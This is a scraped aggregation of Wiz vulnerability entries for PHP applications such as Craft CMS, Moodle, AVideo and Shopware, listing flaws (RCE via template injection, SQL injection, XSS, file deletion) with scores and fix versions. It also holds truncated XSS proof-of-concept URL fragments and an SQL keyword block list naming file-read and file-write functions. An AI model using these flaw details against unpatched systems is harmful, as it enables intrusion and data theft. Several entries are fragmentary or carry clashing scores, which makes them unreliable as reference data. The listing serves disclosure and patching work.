blogs_wiz · CVSS 6.1 · MEDIUM
## CVE-2026-28695: PHP vulnerability analysis and mitigation
Craft is a content management system (CMS). There is an authenticated admin RCE in Craft CMS 5.8.21 via Server-Side Template Injection using the create() Twig function combined with a Symfony Process gadget chain. The create() Twig function exposes Craft::createObject(), which allows instantiation of arbitrary PHP classes with constructor arguments. Combined with the bundled symfony/process dependency, this enables RCE. This bypasses the fix implemented for CVE-2025-57811 (patched in 5.8.7). This vulnerability is fixed in 5.9.0-beta.1 and 4.17.0-beta.1.
Source: NVD
Score 7.5
Published March 4, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
PHP
Craft CMS
Has Public Exploit Yes
Has CISA KEV Exploit No
Wiz
CVE-2026-26016 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz · CVSS 9.2 · CRITICAL
## CVE-2026-26016: PHP vulnerability analysis and mitigation
/etc/pterodactyl/config.yml
Source: NVD
Score 9.2
Published February 19, 2026
Severity CRITICAL
CNA Score 9.2
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 19.4
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
pterodactyl/panel
Sources
NVD
Composer Severity CRITICAL Has Fix Added at: Feb 18, 2026
Wiz
CVE-2026-33161 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz · CVSS 1.3 · LOW
## CVE-2026-33161: PHP vulnerability analysis and mitigation
Craft CMS is a content management system (CMS). From version 4.0.0-RC1 to before version 4.17.8 and from version 5.0.0-RC1 to before version 5.9.14, a low-privileged authenticated user can call assets/image-editor with the ID of a private asset they cannot view and still receive editor response data, including focalPoint. The endpoint returns private editing metadata without per-asset authorization validation. This issue has been patched in versions 4.17.8 and 5.9.14.
Source: NVD
Score 1.3
Published March 24, 2026
Severity LOW
CNA Score 1.3
Affected Technologies
PHP
Craft CMS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Wiz
CVE-2025-67853 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz · CVSS 7.5 · HIGH
## CVE-2025-67853: PHP vulnerability analysis and mitigation
A flaw was found in Moodle. A remote attacker could exploit a lack of proper rate limiting in the confirmation email service. This vulnerability allows attackers to more easily enumerate or guess user credentials, facilitating brute-force attacks against user accounts.
Source: NVD
Score 7.5
Published February 3, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
PHP
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
moodle
moodle/moodle
Sources
NVD
Composer Severity HIGH Has Fix Added at: Feb 04, 2026
Nix Severity HIGH Has Fix Added a
Wiz
CVE-2025-68951 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz · CVSS 5.4 · MEDIUM
## CVE-2025-68951: PHP vulnerability analysis and mitigation
phpMyFAQ is an open source FAQ web application. Versions 4.0.14 and 4.0.15 have a stored cross-site scripting (XSS) vulnerability that allows an attacker to execute arbitrary JavaScript in an administrator’s browser by registering a user whose display name contains HTML entities. When an administrator views the admin user list, the payload is decoded server-side and rendered without escaping, resulting in script execution in the admin context. Version 4.0.16 contains a patch for the issue.
Source: NVD
Score 6.1
Published December 29, 2025
Severity MEDIUM
CNA Score 5.4
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Wiz
CVE-2026-31887 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz · CVSS 8.9 · HIGH
## CVE-2026-31887: PHP vulnerability analysis and mitigation
Shopware is an open commerce platform. Prior to 6.7.8.1 and 6.6.10.15, an insufficient check on the filter types for unauthenticated customers allows access to orders of other customers. This is part of the deepLinkCode support on the store-api.order endpoint. This vulnerability is fixed in 6.7.8.1 and 6.6.10.15.
Source: NVD
Score 8.9
Published March 11, 2026
Severity HIGH
CNA Score 8.9
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 13.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
shopware/core
shopware/platform
Sources
NVD
Composer Severity HIGH Has Fix Added at:
Wiz
CVE-2026-29177 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz · CVSS 1.9 · LOW
## CVE-2026-29177: PHP vulnerability analysis and mitigation
Craft Commerce is an ecommerce platform for Craft CMS. Prior to 4.10.2 and 5.5.3, a Stored Cross-Site Scripting (XSS) vulnerability exists in the Craft Commerce Order details. Malicious JavaScript can be injected via the Shipping Method Name, Order Reference, or Site Name. When a user opens the order details slideout via a double-click on the order index page, the injected payload executes. This vulnerability is fixed in 4.10.2 and 5.5.3.
Source: NVD
Score 1.9
Published March 10, 2026
Severity LOW
CNA Score 1.9
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.1
Wiz
CVE-2026-27599 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz · CVSS 4.7 · MEDIUM
## CVE-2026-27599: PHP vulnerability analysis and mitigation
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input within System Settings – Mail Settings. Several configuration fields, including Mail Server, Mail Port, Email Address, Email Password, Mail Protocol, and TLS settings, accept attacker-controlled input that is stored server-side and later rendered without proper output encoding. This issue has been patched in version 0.31.0.0.
Source: NVD
Score 7.2
Published March 30, 2026
Severity HIGH
CNA Score 4.7
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
Wiz
GHSA-6w82-v552-wjw2 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz · CVSS 5.3 · MEDIUM
## GHSA-6w82-v552-wjw2: PHP vulnerability analysis and mitigation
## Impact
By exploiting the XSS vulnerabilities, malicious actors can perform harmful actions in the user's web browser in the session context of the affected user. Some examples of this include, but are not limited to: Obtaining user session tokens. Performing administrative actions (when an administrative user is affected). These vulnerabilities pose a high security risk. Since a sensitive cookie is not configured with the HttpOnly attribute and administrator JWTs are stored in sessionStorage, any successful XSS attack could enable the theft of session cookies and administrative tokens.
## Description
waitTime
/account/login?loginError=1&waitTime=Here
errorSnippet
/account/login?loginError=1&errorSnippet=Reset%
Wiz
CVE-2026-32279 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz · CVSS 6.8 · MEDIUM
## CVE-2026-32279: PHP vulnerability analysis and mitigation
Connect-CMS is a content management system. In versions on the 1.x series up to and including 1.41.0 and versions on the 2.x series up to and including 2.41.0, a Server-Side Request Forgery (SSRF) issue exists in the external page migration feature of the Page Management Plugin. Versions 1.41.1 and 2.41.1 contain a patch.
Source: NVD
Score 6.8
Published March 23, 2026
Severity MEDIUM
CNA Score 6.8
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 14.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
opensource-workshop/connect-cms
Sources
NVD
Composer Severity MEDIUM Has F
Wiz
CVE-2026-25514 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz · CVSS 8.7 · HIGH
## CVE-2026-25514: PHP vulnerability analysis and mitigation
FacturaScripts is open-source enterprise resource planning and accounting software. Prior to version 2025.81, FacturaScripts contains a critical SQL injection vulnerability in the autocomplete functionality that allows authenticated attackers to extract sensitive data from the database including user credentials, configuration settings, and all stored business data. The vulnerability exists in the CodeModel::all() method where user-supplied parameters are directly concatenated into SQL queries without sanitization or parameterized binding. This issue has been patched in version 2025.81.
Source: NVD
Score 8.7
Published February 4, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
PHP
Has Public Exploit Yes
Wiz
CVE-2021-47763 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz · CVSS 8.8 · HIGH
## CVE-2021-47763: PHP vulnerability analysis and mitigation
Aimeos 2021.10 LTS contains a SQL injection vulnerability in the json api 'sort' parameter that allows attackers to inject malicious database queries. Attackers can manipulate the sort parameter to reveal table and column names by sending crafted GET requests to the jsonapi/review endpoint.
Source: NVD
Score 8.8
Published January 15, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
aimeos/aimeos-laravel
Sources
NVD
Composer Severity HIGH No Fix Added at: Jan 18, 2026
Wiz
CVE-2026-26047 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz · CVSS 6.5 · MEDIUM
## CVE-2026-26047: PHP vulnerability analysis and mitigation
A denial-of-service vulnerability was identified in Moodle’s TeX formula editor. When rendering TeX content using mimetex, insufficient execution time limits could allow specially crafted formulas to consume excessive server resources. An authenticated user could abuse this behavior to degrade performance or cause service interruption.
Source: NVD
Score 6.5
Published February 21, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
PHP
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 22.7
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
moodle
moodle/moodle
Sources
NVD
Wiz
CVE-2026-1193 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz · CVSS 5.3 · MEDIUM
## CVE-2026-1193: PHP vulnerability analysis and mitigation
A vulnerability was identified in MineAdmin 1.x/2.x. The impacted element is an unknown function of the file /system/cache/view of the component View Interface. The manipulation leads to improper authorization. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.
Source: NVD
Score 5.3
Published January 19, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
Wiz
CVE-2026-33885 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz · CVSS 6.1 · MEDIUM
## CVE-2026-33885: PHP vulnerability analysis and mitigation
Statamic is a Laravel and Git powered content management system (CMS). Prior to versions 5.73.16 and 6.7.2, the external URL detection used for redirect validation on unauthenticated endpoints could be bypassed, allowing users to be redirected to external URLs after actions like form submissions and authentication flows. This has been fixed in 5.73.16 and 6.7.2.
Source: NVD
Score 6.1
Published March 27, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 12.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
statamic/cms
Sources
NVD
Wiz
CVE-2026-21451 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz · CVSS 5.2 · MEDIUM
## CVE-2026-21451: PHP vulnerability analysis and mitigation
Source: NVD
Score 5.2
Published January 2, 2026
Severity MEDIUM
CNA Score 5.2
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
bagisto/bagisto
Sources
NVD
Composer Severity MEDIUM Has Fix Added at: Jan 03, 2026
Wiz
CVE-2026-29905 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz · CVSS 6.5 · MEDIUM
## CVE-2026-29905: PHP vulnerability analysis and mitigation
Kirby CMS through 5.1.4 allows an authenticated user with 'Editor' permissions to cause a persistent Denial of Service (DoS) via a malformed image upload. The application fails to properly validate the return value of the PHP getimagesize() function. When the system attempts to process this file for metadata or thumbnail generation, it triggers a fatal TypeError.
Source: NVD
Score 6.5
Published March 26, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 11.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
getkirby/cms
Sources
NVD
Wiz
CVE-2026-27621 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz · CVSS 6.8 · MEDIUM
## CVE-2026-27621: PHP vulnerability analysis and mitigation
viewBox
viewBox
Source: NVD
Score 6.8
Published February 25, 2026
Severity MEDIUM
CNA Score 6.8
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
typicms/core
Sources
NVD
Composer Severity MEDIUM Has Fix Added at: Mar 02, 2026
Wiz
CVE-2026-27836 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz · CVSS 7.5 · HIGH
## CVE-2026-27836: PHP vulnerability analysis and mitigation
/api/webauthn/prepare
Source: NVD
Score 7.5
Published February 27, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 13.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
thorsten/phpmyfaq
Sources
NVD
Composer Severity HIGH Has Fix Added at: Mar 02, 2026
Wiz
CVE-2026-33647 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz · CVSS 8.8 · HIGH
## CVE-2026-33647: PHP vulnerability analysis and mitigation
ImageGallery::saveFile()
finfo
.php
.php
Source: NVD
Score 8.8
Published March 23, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 52.5
Exploitation Probability (EPSS) 0.3
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity HIGH No Fix Added at: Mar 26, 2026
Wiz
CVE-2026-30932 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz · CVSS 8.6 · HIGH
## CVE-2026-30932: PHP vulnerability analysis and mitigation
Froxlor is open source server administration software. Prior to version 2.3.5, the DomainZones.add API endpoint (accessible to customers with DNS enabled) does not validate the content field for several DNS record types (LOC, RP, SSHFP, TLSA). An attacker can inject newlines and BIND zone file directives (e.g. $INCLUDE) into the zone file that gets written to disk when the DNS rebuild cron job runs. This issue has been patched in version 2.3.5.
Source: NVD
Score 8.6
Published March 24, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 16.2
Wiz
CVE-2026-32265 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz · CVSS 6.9 · MEDIUM
## CVE-2026-32265: PHP vulnerability analysis and mitigation
BucketsController->actionLoadBucketData()
Source: NVD
Score 6.9
Published March 18, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
craftcms/aws-s3
Sources
NVD
Composer Severity MEDIUM Has Fix Added at: Mar 17, 2026
Wiz
CVE-2025-65854 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz · CVSS 9.8 · CRITICAL
## CVE-2025-65854: PHP vulnerability analysis and mitigation
Insecure permissions in the scheduled tasks feature of MineAdmin v3.x allows attackers to execute arbitrary commands and execute a full account takeover.
Source: NVD
Score 9.8
Published December 12, 2025
Severity CRITICAL
CNA Score 9.8
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 28.2
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
mineadmin/mineadmin
Sources
NVD
Composer Severity CRITICAL No Fix Added at: Dec 14, 2025
Wiz
GHSA-j8g6-5gqc-mq36 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz · CVSS 5.3 · MEDIUM
## GHSA-j8g6-5gqc-mq36: PHP vulnerability analysis and mitigation
## Impact
MySQLSelectTool
SELECT
INTO OUTFILE
INTO DUMPFILE
FILE
MySQLSelectTool
## Patches
Not patched in: 2.8.11
Fixed in: 2.8.12
Recommended fix direction:
INTO
OUTFILE
DUMPFILE
LOAD_FILE
Prefer AST-based validation (SQL parser) over keyword checks.
Constrain allowed tables/columns and disallow multi-statements.
## Workarounds
If you cannot upgrade immediately:
MySQLSelectTool
FILE
secure_file_priv
INTO OUTFILE
INTO DUMPFILE
LOAD_FILE
;
Source: NVD
Score 8.2
Published December 9, 2025
Severity HIGH
CNA Score N/A
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Wiz
GHSA-5724-x3rh-5qqq Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
## GHSA-5724-x3rh-5qqq: PHP vulnerability analysis and mitigation
## Summary
Multiple reflected Cross-site Scripting (XSS) vulnerabilities across both authenticated and unauthenticated portions of the application. These findings present a significant security risk, as they can be leveraged to execute arbitrary JavaScript in a victim’s browser under various contexts.
## Impact and Exploitation
While XSS is often treated as a standalone issue, these vulnerabilities have broader implications. Specifically, they can be used as launch points to exploit other significant vulnerabilities.
Proof of concept links follow. All testing was performed on my local Docker setup running the latest version of the application.
## Proof of Concepts
## Authenticated Reflected XSS
Wiz
CVE-2026-32277 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz · CVSS 8.7 · HIGH
## CVE-2026-32277: PHP vulnerability analysis and mitigation
Connect-CMS is a content management system. In versions 1.35.0 through 1.41.0 and 2.35.0 through 2.41.0, a DOM-based Cross-Site Scripting (XSS) issue exists in the Cabinet Plugin list view. Versions 1.41.1 and 2.41.1 contain a patch.
Source: NVD
Score 8.7
Published March 23, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
opensource-workshop/connect-cms
Sources
NVD
Composer Severity HIGH Has Fix Added at: Mar 24, 2026
Wiz
CVE-2026-33716 [CRITICAL] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.4
## CVE-2026-33716 : PHP vulnerability analysis and mitigation
Referenced in the advisory: `plugin/Live/standAloneFiles/control.json.php`, `streamerURL`, `{"error": false}`.
Source : NVD
Score 9.4
Published March 23, 2026
Severity CRITICAL
CNA Score 9.4
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 26.1
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity CRITICAL No Fix Added at: Mar 26, 2026
Wiz
CVE-2025-69197 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
## CVE-2025-69197 : PHP vulnerability analysis and mitigation
Pterodactyl is a free, open-source game server management panel. Versions 1.11.11 and below allow TOTP to be used multiple times during its validity window. Users with 2FA enabled are prompted to enter a token during sign-in, and afterward it is not sufficiently marked as used in the system. This allows an attacker who intercepts that token to use it in addition to a known username/password during the 60-second token validity window. The attacker must have intercepted a valid 2FA token (for example, during a screen share). This issue is fixed in version 1.12.0.
Source : NVD
Score 6.5
Published January 6, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
Wiz
GHSA-67v7-3g49-mxh2 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## GHSA-67v7-3g49-mxh2 : PHP vulnerability analysis and mitigation
## Impact
A time-based user enumeration vulnerability exists in the user authentication functionality of PrestaShop. It allows an attacker to determine whether a customer account exists in the system by measuring response times.
## Patches
8.2.4 and 9.0.3
## Workarounds
None.
## References
Found by Lam Yiu Tung
Source : NVD
Score 5.3
Published February 3, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
prestashop/prestashop
Sources
NVD
Wiz
CVE-2026-33502 [CRITICAL] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.3
## CVE-2026-33502 : PHP vulnerability analysis and mitigation
Referenced in the advisory: `plugin/Live/test.php`.
Source : NVD
Score 8.2
Published March 23, 2026
Severity HIGH
CNA Score 9.3
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 17
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity CRITICAL No Fix Added at: Mar 21, 2026
Wiz
CVE-2026-33687 [HIGH] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
## CVE-2026-33687 : PHP vulnerability analysis and mitigation
Referenced in the advisory: `ApiFormUploadController`, `validation_rule`, `validation_rule[]=file`.
Source : NVD
Score 8.8
Published March 26, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 14.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
code16/sharp
Sources
NVD
Composer Severity HIGH Has Fix Added at: Mar 26, 2026
Wiz
CVE-2026-33688 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## CVE-2026-33688 : PHP vulnerability analysis and mitigation
Referenced in the advisory: `objects/userRecoverPass.php`.
Source : NVD
Score 5.3
Published March 23, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 17.3
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Mar 26, 2026
Wiz
CVE-2026-33723 [HIGH] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
## CVE-2026-33723 : PHP vulnerability analysis and mitigation
Referenced in the advisory: `Subscribe::save()`, `objects/subscribe.php`, `$this->users_id`, `$_POST['user_id']`, `subscribe.json.php`, `subscribeNotify.json.php`.
Source : NVD
Score 6.5
Published March 23, 2026
Severity MEDIUM
CNA Score 7.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity HIGH No Fix Added at: Mar 26, 2026
Wiz
CVE-2026-29788 [HIGH] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.4
## CVE-2026-29788 : PHP vulnerability analysis and mitigation
TSPortal is the WikiTide Foundation’s in-house platform used by the Trust and Safety team to manage reports, investigations, appeals, and transparency work. Prior to version 30, conversion of empty strings to null allows disguising DPA reports as genuine self-deletion reports. This issue has been patched in version 30.
Source : NVD
Score 8.4
Published March 6, 2026
Severity HIGH
CNA Score 8.4
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
miraheze/ts-portal
Sources
NVD
Composer Severity HIGH Has Fix Added at: Mar 29,
Wiz
CVE-2026-33297 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.1
## CVE-2026-33297 : PHP vulnerability analysis and mitigation
Referenced in the advisory: `setPassword.json.php`.
Source : NVD
Score 5.1
Published March 23, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Mar 20, 2026
Wiz
GHSA-vvg7-8rmq-92g7 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## GHSA-vvg7-8rmq-92g7 : PHP vulnerability analysis and mitigation
## Description
In applications built with the Auth0-PHP SDK, the audience validation in access tokens is performed improperly. Without proper validation, affected applications may accept ID tokens as Access tokens.
## Affected product and versions
Projects are affected if they meet the following preconditions:
Applications using the Auth0 WordPress plugin with a version between 5.0.0-BETA0 and 5.4.0,
Auth0 WordPress plugin uses the Auth0-PHP SDK with versions between 8.0.0 and 8.17.0.
## Resolution
Upgrade the Auth0 WordPress plugin to version 5.5.0 or greater.
## Acknowledgement
Okta would like to thank Jafar Sadiq (iaf4r) for their discovery and responsible disclosure.
Source : NVD
Score 6.8
Wiz
CVE-2026-34572 [HIGH] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
## CVE-2026-34572 : PHP vulnerability analysis and mitigation
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to immediately revoke active user sessions when an account is deactivated. Due to a logic flaw in the backend design, account state changes are enforced only during authentication (login), not for already-established sessions. The system implicitly assumes that authenticated users remain trusted for the lifetime of their session. There is no session expiration or account expiration mechanism in place, causing deactivated accounts to retain indefinite access until the user manually logs out. This behavior breaks the intended access control
Wiz
CVE-2025-14675 [HIGH] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.2
## CVE-2025-14675 : PHP vulnerability analysis and mitigation
The Meta Box plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the 'ajax_delete_file' function in all versions up to, and including, 5.11.1. This makes it possible for authenticated attackers, with Contributor-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).
Source : NVD
Score 7.2
Published March 7, 2026
Severity HIGH
CNA Score 7.2
Affected Technologies
PHP
WordPress
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 75.5
Wiz
CVE-2025-69213 [HIGH] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
## CVE-2025-69213 : PHP vulnerability analysis and mitigation
OpenSTAManager is an open source management software for technical assistance and invoicing. In version 2.9.8 and prior, a SQL Injection vulnerability exists in the ajax_complete.php endpoint when handling the get_sedi operation. An authenticated attacker can inject malicious SQL code through the idanagrafica parameter, leading to unauthorized database access. At time of publication, no known patch exists.
Source : NVD
Score 8.7
Published February 4, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 11.7
Exploitation Probability (EPSS) N/A
Wiz
CVE-2022-50807 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## CVE-2022-50807 : PHP vulnerability analysis and mitigation
Rejected reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue.
Source : NVD
Score 6.9
Published January 13, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
concrete5/concrete5
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Jan 14, 2026
Wiz
CVE-2026-35449 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## CVE-2026-35449 : PHP vulnerability analysis and mitigation
WWBN AVideo is an open source video platform. In versions 26.0 and prior, the install/test.php diagnostic script has its CLI-only access guard disabled by commenting out the die() statement. The script remains accessible via HTTP after installation, exposing video viewer statistics including IP addresses, session IDs, and user agents to unauthenticated visitors.
Source : NVD
Score 5.3
Published April 6, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Wiz
CVE-2025-70791 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
## CVE-2025-70791 : PHP vulnerability analysis and mitigation
